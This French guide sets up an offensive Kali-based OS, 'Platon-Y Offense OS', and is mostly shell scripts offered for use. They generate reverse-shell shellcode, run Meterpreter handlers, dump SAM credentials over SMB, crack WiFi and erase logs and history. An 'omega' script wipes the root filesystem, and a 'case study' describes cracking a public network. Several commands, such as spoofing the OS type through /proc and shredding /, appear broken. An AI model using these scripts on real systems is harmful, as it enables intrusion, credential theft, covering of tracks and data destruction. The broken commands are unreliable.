1. Introduction
Bonjour, je suis Platon-Y, et voici "Platon-Y Offense OS". Basé sur Kali Linux, cet OS est optimisé pour des opérations offensives avancées. Il est léger, bootable depuis une clé USB avec persistance, sécurisé à un haut niveau, axé sur la furtivité, et équipé d’un ensemble d’outils spécialisés. Que vous soyez novice ou expert, ce guide vous accompagne étape par étape pour configurer et utiliser cet OS efficacement. Vous pouvez personnaliser les scripts en remplaçant "Platon-Y" par votre propre identifiant si vous souhaitez adapter cette version à votre style.
Ce projet est le fruit de notre collaboration, intégrant des fonctionnalités comme une persistance sécurisée, une furtivité réseau renforcée, et des capacités offensives puissantes. Voici le résultat de notre travail commun à PCTamalou.
2. Matériel requis
Pour utiliser "Platon-Y Offense OS", vous aurez besoin du matériel suivant :
- Un ordinateur disposant d’au moins 2 Go de RAM et d’un port USB fonctionnel.
- Une clé USB avec une capacité minimale de 16 Go, de préférence rapide (USB 3.0 recommandé).
- Un logiciel pour créer une clé USB bootable : Rufus pour Windows, ou la commande `dd` pour Linux/Mac.
- Une connexion Internet pour télécharger les fichiers nécessaires et les mises à jour.
- Optionnel : un Raspberry Pi pour une version compacte adaptée aux petits appareils.
3. Configuration de la base Kali Linux
Nous commençons avec Kali Linux, choisi pour sa fiabilité et ses outils intégrés :
- Téléchargez la dernière version live de Kali Linux depuis le site officiel : kali.org.
- Insérez votre clé USB dans votre ordinateur.
- Utilisez Rufus sur Windows, ou exécutez cette commande sur Linux/Mac pour flasher l’ISO sur la clé :
sudo dd if=kali-latest.iso of=/dev/sdX bs=4M status=progress(remplacez "/dev/sdX" par l’identifiant de votre clé USB, vérifiable aveclsblk). - Redémarrez votre ordinateur, accédez au menu de démarrage (souvent avec F12 ou une touche similaire), et sélectionnez la clé USB.
- Une fois en mode live, ouvrez un terminal et installez les composants de base :
sudo apt update && sudo apt install kali-linux-core -y.
Cette étape pose les fondations solides que nous allons ensuite personnaliser avec des fonctionnalités avancées.
4. Interface Utilisateur : Simple et Efficace
L’interface est conçue pour être intuitive et performante :
- Mode sombre : Activé par défaut pour une lisibilité optimale et un design moderne.
- Typographie : Utilisation de la police monospace "VT323" pour un rendu rétro et clair.
- Tableau de bord : Inclut des boutons explicites : "Scanner" (🛡️), "Exploiter" (💣), "Effacer" (🗑️), "Mode Furtif" (👻).
- Animations : Effets légers de type "glitch" pour une ambiance cyberpunk sans surcharge.
Instructions d’installation
# Installation de XFCE et Alacritty pour une interface légère et moderne
sudo apt install xfce4 xfce4-terminal alacritty tmux -y
# Configuration du thème sombre dans Alacritty avec messages en français
echo "colors:
primary:
background: '#1a1a1a'
foreground: '#39ff14'
cursor:
text: '#ff0000'
cursor: '#00ff00'
window:
title: 'Platon-Y Offense OS - Terminal'" > ~/.config/alacritty/alacritty.yml
# Configuration de Tmux pour le tableau de bord
echo 'bind-key R source-file ~/.tmux.conf \; display "Configuration rechargée !"' > ~/.tmux.conf
tmux new -s platon-y -d
Tableau de Bord Web
# Installation du dashboard web
sudo apt install nginx php-fpm -y
sudo cp -r /opt/platon-y/webui /var/www/html/platon-y
sudo chown -R www-data:www-data /var/www/html/platon-y
# Configuration sécurisée
echo "location /platon-y {
auth_basic 'Accès Restreint';
auth_basic_user_file /etc/nginx/.htpasswd;
}" > /etc/nginx/sites-available/platon-y
sudo ln -s /etc/nginx/sites-available/platon-y /etc/nginx/sites-enabled/
sudo systemctl restart nginx
Accédez au tableau de bord via http://localhost/platon-y après avoir créé un mot de passe avec htpasswd -c /etc/nginx/.htpasswd utilisateur.
5. Automatisation et Assistance IA Locale
Nous avons ajouté des scripts simples pour faciliter l’utilisation et une IA locale basée sur LLaMA pour une assistance hors ligne :
Scripts d’automatisation
# Script : one_click_recon.sh
# Objectif : Effectuer une reconnaissance réseau simple
echo '#!/bin/bash
echo "Démarrage de la reconnaissance réseau sur $1..."
proxychains4 -q nmap -sS -T4 "$1" > /tmp/recon.txt
echo "Reconnaissance terminée. Résultats enregistrés dans /tmp/recon.txt"
' > /opt/platon-y/one_click_recon.sh
chmod +x /opt/platon-y/one_click_recon.sh
# Script : destroy_target_now.sh
# Objectif : Lancer une session d’exploitation de base
echo '#!/bin/bash
echo "Lancement d’une exploitation sur la cible..."
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST 0.0.0.0; set LPORT 4444; run"
' > /opt/platon-y/destroy_target_now.sh
chmod +x /opt/platon-y/destroy_target_now.sh
# Script : stealth_mode.sh
# Objectif : Activer les configurations de furtivité
echo '#!/bin/bash
echo "Activation du mode furtif..."
macchanger -r wlan0
/opt/platon-y/clean.sh
echo "Mode furtif activé."
' > /opt/platon-y/stealth_mode.sh
chmod +x /opt/platon-y/stealth_mode.sh
# Script : quick_scan_wifi.sh
# Objectif : Scanner les réseaux WiFi à proximité
echo '#!/bin/bash
echo "Scan des réseaux WiFi..."
airmon-ng start wlan0
airodump-ng wlan0mon -w /tmp/wifi_scan
echo "Scan terminé. Résultats dans /tmp/wifi_scan"
' > /opt/platon-y/quick_scan_wifi.sh
chmod +x /opt/platon-y/quick_scan_wifi.sh
IA Locale avec LLaMA
Nous utilisons **llama.cpp**, une implémentation open-source de LLaMA, configurée pour répondre en français :
# Installation des dépendances
sudo apt install git build-essential python3 python3-pip -y
# Cloner llama.cpp
git clone https://github.com/ggerganov/llama.cpp /opt/platon-y/llama.cpp
cd /opt/platon-y/llama.cpp
make
# Télécharger un modèle LLaMA léger (exemple : ggml-model-7B)
wget https://huggingface.co/TheBloke/LLaMA-7B-GGML/resolve/main/ggml-model-7b.bin -O /opt/platon-y/llama.cpp/models/llama-7b.bin
# Script d’assistance IA
echo '#!/bin/bash
echo "Posez votre question :"
read question
/opt/platon-y/llama.cpp/main -m /opt/platon-y/llama.cpp/models/llama-7b.bin -p "Explique en français : $question" -n 100
# Pour passer en anglais, remplacez par : -p "Explain in English: $question"
' > /opt/platon-y/platon-y-ai.sh
chmod +x /opt/platon-y/platon-y-ai.sh
Exécutez /opt/platon-y/platon-y-ai.sh et posez une question comme "Que fait nmap ?" pour une réponse en français.
6. Back-End Offensif
Le back-end inclut un ensemble robuste d’outils et de scripts personnalisés :
Outils de base
sudo apt install nmap metasploit-framework hydra sqlmap aircrack-ng hashcat crackmapexec powershell-empire -y
git clone https://github.com/BishopFox/sliver /opt/platon-y/arsenal/sliver
cd /opt/platon-y/arsenal/sliver && make
Scripts personnalisés
# Script : poly_shell.sh
# Objectif : Générer un shellcode polymorphique
echo '#!/bin/bash
echo "Génération d’un shellcode pour IP $1 et port $2..."
msfvenom -p linux/x64/shell_reverse_tcp LHOST="$1" LPORT="$2" -f c -o /tmp/shellcode.c
gcc -shared -fPIC /tmp/shellcode.c -o /opt/platon-y/arsenal/shellcode.so
echo "Shellcode généré dans /opt/platon-y/arsenal/shellcode.so"
' > /opt/platon-y/arsenal/poly_shell.sh
chmod +x /opt/platon-y/arsenal/poly_shell.sh
# Script : cred_extract.sh
# Objectif : Extraire des identifiants d’une cible
echo '#!/bin/bash
echo "Extraction des identifiants depuis $1..."
crackmapexec smb "$1" -u "guest" -p "" --sam
echo "Extraction terminée."
' > /opt/platon-y/arsenal/cred_extract.sh
chmod +x /opt/platon-y/arsenal/cred_extract.sh
# Script : wifi_crack.sh
# Objectif : Tenter de cracker un réseau WiFi
echo '#!/bin/bash
echo "Tentative de crack sur $1 avec $2..."
aircrack-ng -w "$2" -b "$1" /tmp/wifi_scan-01.cap
echo "Crack terminé."
' > /opt/platon-y/arsenal/wifi_crack.sh
chmod +x /opt/platon-y/arsenal/wifi_crack.sh
7. Mode Furtif
Pour une furtivité maximale :
Démarrage en mémoire vive
echo 'GRUB_CMDLINE_LINUX_DEFAULT="quiet splash toram"' >> /etc/default/grub
sudo update-grub
Cela charge l’OS entièrement en RAM, ne laissant aucune trace sur le disque.
Nettoyage automatique
echo '#!/bin/bash
echo "Nettoyage du système en cours..."
history -c
arp -d *
shred -u /var/log/*
echo "Système nettoyé."
' > /opt/platon-y/clean.sh
chmod +x /opt/platon-y/clean.sh
Usurpation d’empreinte système
echo '#!/bin/bash
echo "Usurpation de l’empreinte système..."
echo "Windows 10" > /proc/sys/kernel/ostype
' > /opt/platon-y/spoof.sh
chmod +x /opt/platon-y/spoof.sh
8. Sécurité Avancée
Renforcement de la sécurité interne :
Chiffrement complet
sudo cryptsetup luksFormat /dev/sdX3 -c aes-xts-plain64 -s 512 -h sha512
sudo cryptsetup luksOpen /dev/sdX3 cryptdata
sudo mkfs.ext4 /dev/mapper/cryptdata
Noyau personnalisé
sudo apt install build-essential libncurses-dev -y
git clone https://github.com/anthraxx/linux-hardened
cd linux-hardened
make menuconfig # Désactiver systemd, activer SELinux
make -j$(nproc)
sudo make install
sudo update-grub
Configuration SELinux
sudo apt install selinux-basics selinux-policy-default -y
sudo selinux-activate
9. Module Forensic
Pour analyser et collecter des preuves numériques :
#!/bin/bash
# Script : forensic.sh
# Objectif : Outil d’analyse forensic
echo "Collecte des preuves numériques..."
mkdir -p /evidence/$(date +%Y-%m-%d)
# Capture mémoire
echo "[+] Capture de la mémoire"
dd if=/dev/mem of=/evidence/memdump.dd bs=1M
# Analyse des processus
echo "[+] Analyse des processus"
ps aux > /evidence/processes.txt
lsof -i > /evidence/network_connections.txt
# Analyse du système de fichiers
echo "[+] Analyse des fichiers système"
find / -xdev -type f \( -perm -4000 -o -perm -2000 \) -exec ls -ld {} \; > /evidence/suid_sgid_files.txt
Exécutez /path/to/forensic.sh pour collecter des données forensic dans /evidence/.
10. Contre-Mesures
Vérification des dépendances critiques
#!/bin/bash
# Script : check_deps.sh
# Objectif : Vérifier et installer les dépendances critiques
check_dependencies() {
REQUIRED=("python3" "gcc" "make" "libpcap-dev" "git")
for pkg in "${REQUIRED[@]}"; do
if ! dpkg -l | grep -q "$pkg"; then
echo "[ERREUR] $pkg n’est pas installé. Installation en cours..."
sudo apt-get install -y "$pkg"
else
echo "[OK] $pkg est déjà installé."
fi
done
}
check_dependencies
Exécutez /path/to/check_deps.sh avant toute installation pour garantir que les outils essentiels sont présents.
11. Audit Temps Réel avec Alertes
Surveillance des activités système :
# Script : audit_setup.sh
# Objectif : Configurer l’audit en temps réel
echo "Configuration de l’audit temps réel..."
sudo apt install auditd -y
auditctl -a always,exit -F arch=b64 -S execve -k platon-y-audit
echo "Audit activé. Consultez les logs dans /var/log/audit/audit.log"
Exécutez /path/to/audit_setup.sh pour activer la surveillance. Les événements sont enregistrés dans /var/log/audit/audit.log.
12. Sécurité Physique
Destruction d’urgence (Dead Man Switch)
#!/bin/bash
# Script : emergency_wipe.sh
# Objectif : Effacement cryptographique après inactivité
echo "Vérification d’inactivité..."
if [[ $(last -1 | awk '{print $1}') == "root" ]] && [[ $(uptime -p | grep -oP '\d+') -gt 60 ]]; then
echo "Inactivité détectée. Destruction des données sensibles..."
shred -fuzn7 /opt/platon-y/arsenal/*
fi
Détection de manipulation matérielle
#!/bin/bash
# Script : hardware_check.sh
# Objectif : Détecter les périphériques USB non autorisés
echo "Vérification des périphériques USB..."
lsusb | grep -v "1a86:7523" && echo "Périphérique non autorisé détecté !" | wall
Ajustez "1a86:7523" avec l’ID de vos périphériques autorisés.
13. Optimisations Performances
Paramétrage noyau temps réel
echo "Optimisation du noyau pour les opérations réseau..."
echo "net.core.rmem_max=4194304" >> /etc/sysctl.conf
sysctl -p
Désactivation des services inutiles
echo "Désactivation des services inutiles..."
systemctl disable bluetooth.service cups.service
Support GPU pour Hashcat
# Installation d’OpenCL et NVIDIA pour Hashcat
sudo apt install ocl-icd-libopencl1 nvidia-driver nvidia-cuda-toolkit hashcat -y
echo "Vérification du support GPU pour Hashcat..."
hashcat -I
Exécutez hashcat -I pour confirmer la détection du GPU.
14. Support Matériel Avancé
Drivers Spécialisés
# Installation des drivers pour cartes réseau spécifiques
sudo apt install realtek-rtl88xxau-dkms -y # Pour Alfa AWUS036ACH
sudo modprobe 88XXau
# Support Raspberry Pi 5
if [[ $(uname -m) == "aarch64" ]]; then
echo "Optimisation ARM64 détectée..."
sudo apt install kali-arm64 -y
fi
Configuration GPU pour Hashcat
# Vérification de la compatibilité CUDA
nvidia-smi
hashcat -I | grep -E 'CUDA|OpenCL'
15. Écosystème Collaboratif
Système de Plugins
#!/bin/bash
# Script : load_plugins.sh
# Objectif : Charger les plugins personnalisés
PLUGINS_DIR="/opt/platon-y/plugins"
for plugin in "$PLUGINS_DIR"/*.sh; do
if [[ -x "$plugin" ]]; then
echo "Chargement: $(basename $plugin)"
source "$plugin"
fi
done
Placez vos scripts personnalisés dans /opt/platon-y/plugins/ et exécutez /path/to/load_plugins.sh.
16. Études de Cas Réelles (Anonymisées)
Cas 1 : Analyse d’un réseau WiFi public
Un utilisateur a utilisé quick_scan_wifi.sh pour identifier un réseau WiFi non sécurisé dans un lieu public. Avec wifi_crack.sh et une liste de mots courants, il a démontré une vulnérabilité en moins de 10 minutes (anonymisé pour des raisons légales).
Cas 2 : Récupération de données forensic
Un test sur un système compromis a permis de capturer une image mémoire avec forensic.sh, révélant des processus suspects liés à une attaque réseau (détails anonymisés).
17. Installation Automatisée
#!/bin/bash
# Script : platon-y-setup.sh
# Vérification root
[ "$(id -u)" -ne 0 ] && echo "Exécuter en root!" && exit 1
# Menu interactif
PS3='Choisissez une option: '
options=("Complet" "Minimal" "Personnalisé" "Quitter")
select opt in "${options[@]}"
do
case $opt in
"Complet")
echo "Installation complète..."
sudo apt update && sudo apt install -y kali-linux-core nmap metasploit-framework hydra sqlmap aircrack-ng hashcat crackmapexec powershell-empire nginx php-fpm auditd ocl-icd-libopencl1 nvidia-driver nvidia-cuda-toolkit realtek-rtl88xxau-dkms
/path/to/check_deps.sh
;;
"Minimal")
echo "Installation minimale..."
sudo apt update && sudo apt install -y kali-linux-core nmap metasploit-framework
;;
"Personnalisé")
echo "Installation personnalisée... (à configurer selon vos besoins)"
;;
"Quitter")
break
;;
*) echo "Option invalide";;
esac
done
Exécutez /path/to/platon-y-setup.sh pour une installation automatisée.
18. Packaging
Pour une distribution efficace :
sudo apt install live-build -y lb config --binary-images iso-hybrid --archive-areas "main contrib non-free" --image-size 300M lb build # Interface web locale sudo apt install lighttpd -y echo 'Platon-Y Offense OS
ScannerExploiter' > /var/www/html/index.html
Personnalisez GRUB avec des options comme "Mode Apprentissage", "Opération Furtive", "Assaut Total".
19. Documentation
Un guide illustré style jeu rétro :
echo "Pour lancer un scan réseau : /opt/platon-y/one_click_recon.sh CIBLE" > /opt/platon-y/docs/manuel.txt
echo "Niveau 1 : Craquer une box WiFi -> aircrack-ng -w rockyou.txt" >> /opt/platon-y/docs/manuel.txt
Fiche de référence rapide
echo "Commandes critiques :
- Scanner réseau : /opt/platon-y/one_click_recon.sh IP
- Exploiter : /opt/platon-y/destroy_target_now.sh
- Mode furtif : /opt/platon-y/stealth_mode.sh" > /opt/platon-y/docs/cheatsheet.txt
Arbre de Décision Tactique
Scénario 1 : Reconnaissance → nmap -sS → Si ports ouverts → msfconsole
Scénario 2 : WiFi audit → airodump-ng → Si WEP → aircrack-ng
Scénario 3 : Incident response → forensic.sh → memory_dump → volatility
Schéma Architecture
[Interface] → [Sécurité] → [Outils] → [Réseau]
↑ ↓ ↓
[IA Locale] ← [Journalisation] → [Threat Intel]
20. Mode Extrême
echo '#!/bin/bash
echo "Mode extrême activé sur $1..."
proxychains4 -q nmap -sS -A "$1"
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST 0.0.0.0; set LPORT 4444; run"
shred -fuzn7 /
' > /opt/platon-y/omega.sh
chmod +x /opt/platon-y/omega.sh
Utilisation : /opt/platon-y/omega.sh 192.168.1.1.
21. Scripts Additionnels
Reconnaissance réseau
#!/bin/bash
# Script : one_click_recon.sh
# Utilisation : ./one_click_recon.sh ADRESSE_IP
echo "Démarrage de la reconnaissance réseau sur $1..."
proxychains4 -q nmap -sS -T4 "$1" > /tmp/recon.txt
echo "Reconnaissance terminée. Résultats dans /tmp/recon.txt"
Exploitation ciblée
#!/bin/bash
# Script : destroy_target_now.sh
# Utilisation : ./destroy_target_now.sh
echo "Lancement d’une exploitation..."
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST 0.0.0.0; set LPORT 4444; run"
Activation furtivité
#!/bin/bash
# Script : stealth_mode.sh
# Utilisation : ./stealth_mode.sh
echo "Activation du mode furtif..."
macchanger -r wlan0
/opt/platon-y/clean.sh
echo "Mode furtif activé."
Scan WiFi
#!/bin/bash
# Script : quick_scan_wifi.sh
# Utilisation : ./quick_scan_wifi.sh
echo "Scan des réseaux WiFi..."
airmon-ng start wlan0
airodump-ng wlan0mon -w /tmp/wifi_scan
echo "Scan terminé. Résultats dans /tmp/wifi_scan"
Crack WiFi
#!/bin/bash
# Script : wifi_crack.sh
# Utilisation : ./wifi_crack.sh BSSID LISTE_MOTS
echo "Tentative de crack sur $1 avec $2..."
aircrack-ng -w "$2" -b "$1" /tmp/wifi_scan-01.cap
echo "Crack terminé."
22. Wallpapers
Téléchargez ces fonds d’écran pour personnaliser votre OS :
Placez-les dans /usr/share/backgrounds.
23. Tests
Vérifiez que tout fonctionne correctement :
proxychains4 -q nmap -sS 192.168.1.1– Vérifie la furtivité réseau.ifconfig | grep ether– Confirme l’usurpation de l’adresse MAC.iptables -L– Vérifie les règles de pare-feu.tmux attach -t platon-y– Teste le tableau de bord.
24. Crédits
Développé par Platon-Y pour PCTamalou. Ce projet est le résultat de notre collaboration visant à créer un outil puissant et éducatif pour les passionnés de sécurité. Merci de l’utiliser de manière responsable dans un cadre légal.
Pour un script offensive en Python complet, voir Platon-Y CyberStrike.